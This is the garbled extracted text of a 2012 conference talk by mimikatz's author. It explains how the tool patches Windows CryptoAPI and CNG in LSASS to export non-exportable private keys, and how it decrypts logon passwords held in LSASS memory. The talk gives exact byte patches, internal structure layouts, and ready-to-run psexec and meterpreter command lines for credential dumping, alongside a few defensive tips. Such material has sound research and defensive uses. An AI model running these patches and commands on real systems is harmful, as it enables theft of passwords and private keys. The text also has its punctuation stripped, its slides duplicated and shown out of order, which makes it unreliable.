Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
